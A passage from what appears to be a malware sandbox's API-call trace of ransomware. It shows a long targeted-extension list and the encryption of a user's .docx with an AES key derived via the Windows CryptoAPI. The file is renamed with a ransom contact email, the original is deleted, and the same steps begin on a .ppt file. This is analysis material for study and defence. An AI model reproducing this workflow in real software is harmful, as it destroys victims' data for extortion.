gf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.485] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.485] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.485] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.489] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x5f2a, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x5f2a, lpOverlapped=0x0) returned 1
	[0189.492] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.492] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb770) returned 1
	[0189.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.494] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.494] CryptHashData (hHash=0xfb91f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.494] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.495] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb91f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91b0) returned 1
	[0189.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.495] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x5f2a, dwBufLen=0x5f2a | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x5f30) returned 1
	[0189.495] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.496] RtlMoveMemory (in: Destination=0xfe30b8, Source=0xfdd180, Length=0x5f2a | out: Destination=0xfe30b8) 
	[0189.496] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.496] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe30b8*, pdwDataLen=0x18a1ec*=0x5f2a, dwBufLen=0x5f30 | out: pbData=0xfe30b8*, pdwDataLen=0x18a1ec*=0x5f30) returned 1
	[0189.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.498] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0189.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.498] CryptDestroyHash (hHash=0xfb91f0) returned 1
	[0189.498] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.498] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0189.499] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.499] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.499] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.500] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 125
	[0189.501] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.501] WriteFile (in: hFile=0x390, lpBuffer=0xfe30b8*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe30b8*, lpNumberOfBytesWritten=0x18a648*=0x5f30, lpOverlapped=0x0) returned 1
	[0189.506] CloseHandle (hObject=0x390) returned 1
	[0189.506] CloseHandle (hObject=0x388) returned 1
	[0189.506] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx")) returned 1
	[0189.520] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\op27ti.docx")) returned 0
	[0189.520] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x147e1f40, ftCreationTime.dwHighDateTime=0x1d96e4c, ftLastAccessTime.dwLowDateTime=0x8dbaba0, ftLastAccessTime.dwHighDateTime=0x1d97057, ftLastWriteTime.dwLowDateTime=0x8dbaba0, ftLastWriteTime.dwHighDateTime=0x1d97057, nFileSizeHigh=0x0, nFileSizeLow=0x5d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="QCUQE.ppt", cAlternateFileName="")) returned 1
	[0189.521] lstrcmpW (lpString1="QCUQE.ppt", lpString2="..") returned 1
	[0189.521] lstrcmpW (lpString1="QCUQE.ppt", lpString2=".") returned 1
	[0189.521] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.521] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="QCUQE.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\QCUQE.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\QCUQE.ppt"
	[0189.521] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\QCUQE.ppt") returned 81
	[0189.521] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.521] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\QCUQE.ppt", cchLength=0x51 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt") returned 0x51
	[0189.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.521] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.522] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt"
	[0189.522] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt") returned 81
	[0189.522] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.522] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0189.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.522] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.523] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.523] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.523] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.523] ReadFile (in: hFile=0x388, lpBuffer=0xfdb130, nNumberOfBytesToRead=0x5d7, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdb130*, lpNumberOfBytesRead=0x18a640*=0x5d7, lpOverlapped=0x0) returned 1
	[0189.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.526] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb7f8) returned 1
	[0189.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.528] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.528] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.528] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8fb0) returned 1
	[0189.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.529] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x5d7, dwBufLen=0x5d7 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x5e0) returned 1
	[0189.529] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.529] RtlMoveMemory (in: Destination=0xfdbd48, Source=0xfdb130, Length=0x5d7 | out: Destination=0xfdbd48) 
	[0189.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.529] CryptEncrypt (in: hKey=0xfb8fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdbd48*, pdwDataLen=0x18a1ec*=0x5d7, dwBufLen=0x5e0 | out: pbData=0xfdbd48*, pdwDataLen=0x18a1ec*=0x5e0) returned 1
	[0189.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.530] CryptDestroyKey (hKey=0xfb8fb0) returned 1
	[0189.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.530] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0189.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.530] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0189.530] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.530] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
